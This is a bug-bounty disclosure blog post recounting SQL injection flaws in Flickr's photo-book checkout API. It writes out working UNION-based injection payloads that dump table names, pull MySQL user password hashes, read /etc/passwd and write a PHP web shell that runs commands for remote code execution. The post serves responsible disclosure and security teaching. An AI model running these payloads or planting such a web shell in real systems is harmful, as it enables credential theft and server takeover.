PWN Rules!

Today i will write about a new vulnerability i found in Flickr.com

– How I got MYSQL root password of Flickr Database

– RCE on Flickr server

 

 Flickr Photo Books

http://blog.flickr.net/en/2013/11/19/introducing-flickr-photo-books/

I got a three parameters vulnerable, when you create a page, then click on checkout, Catch the requests

items=105946833&cacheBust=1394640636132&method=flickr.products.orders.create&csrf=1394665CSRFCODE&api_key=608aa99d6d45b5ba6d0a9b23645d64d6&format=json&hermes=1&hermesClient=1&reqId=js4z8lz&nojsoncallback=1

$items was vulnerable -> Blind SQL injection

I went far and got another blind SQL Injection in $page_id parameter

I reported them and waited like 8 days on Hackerone, the vulnerabilities reports not opened.

Two things told me to back again and find more vulnerabilities

1- Two Blind SQL Injection vulnerabilities in a new web development, Telling me that it might be more SQL injection

2- I’m familiar with SQL Injection since 2007, and from my little experience, I’ve found a lot of websites vulnerable to Blind Injection, and after deep search I find other SQL injection somewhere on the application.

So, I decided to back again after 8 days to the book section to find other SQLI.

I turned on Live HTTP headers, and got all the requests in this section and started checking it one by one, parameter by parameter, And finally i got what i wanted

Union based SQL injection in order_id parameter POST

order_id=116564954 &first_name=aaaa&last_name=sssss&street1=ddddddddddd&street2=ddddddd&city=fffffff&state=ff&postal_code=12547&country_code=US&phone=45454545457&method=flickr.products.orders.setShippingAddress&csrf=1365645560%3Acmj2m0s5jvyrpb9%kld65d65d54d54d55d45dsq&api_key=3c7ab2846f4183ecg56s96d5d5w4e644268&format=json&hermes=1&hermesClient=1&reqId=q3oovqa&nojsoncallback=1

By using ORDER BY i got the columns numbers  -> ORDER BY 15

order_id=-116564954 union select 1337,2,3,4,5,6,7,8,9,10,11,12,13,14,15– –&first_name=aaaa&last_name=sssss&street1=ddddddddddd&street2=ddddddd&city=fffffff&state=ff&postal_code=12547&country_code=US&phone=45454545457&method=flickr.products.orders.setShippingAddress&csrf=1365645560%3Acmj2m0s5jvyrpb9%kld65d65d54d54d55d45dsq&api_key=3c7ab2846f4183ecg56s96d5d5w4e644268&format=json&hermes=1&hermesClient=1&reqId=q3oovqa&nojsoncallback=1

1337 on the page, Now i can go

I started with version(), database() etc…

Getting the tables

order_id=-116564954 union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables– –

Just removed some of Flicker tables, You can see Information_schema tables

Then i got MYSQL ROOT PASSWORD

order_id=-116564954 union select group_concat(user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user– –

 

Reading the server files by using LOAD_FILE

I read some files such as /etc/passwd and some log files

order_id=-116564954 union select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14,15– –

It’s the time to convert it to RCE via INTO OUTFILE Function

Writing files on the server

order_id=-116564954 union select “@RaafatSEC“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/tmp/raafat“– –

I tested reading it via load_file, it worked, Check the video

Changing the text and file path to my code

order_id=-116564954 union select “<?php $cmd = $_GET[\’raafat\’]; echo system ($cmd); ?>“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/home/$path/rce.php“– –

/rce.php?raafat=ls -la

After I sent the new POC, Yahoo closed the vulnerabilities in less than 6 hours

The original video was 11 minutes, I removed a lot of shots which contains data from the server

Video: http://www.youtube.com/watch?v=q-CH10Zo0gs

 

Quote of the day

You don’t need a nurse to know how to inject Databases

@RaafatSEC